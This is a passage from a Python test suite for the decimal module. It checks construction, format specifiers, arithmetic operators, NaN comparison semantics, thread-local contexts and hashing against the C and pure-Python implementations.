self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
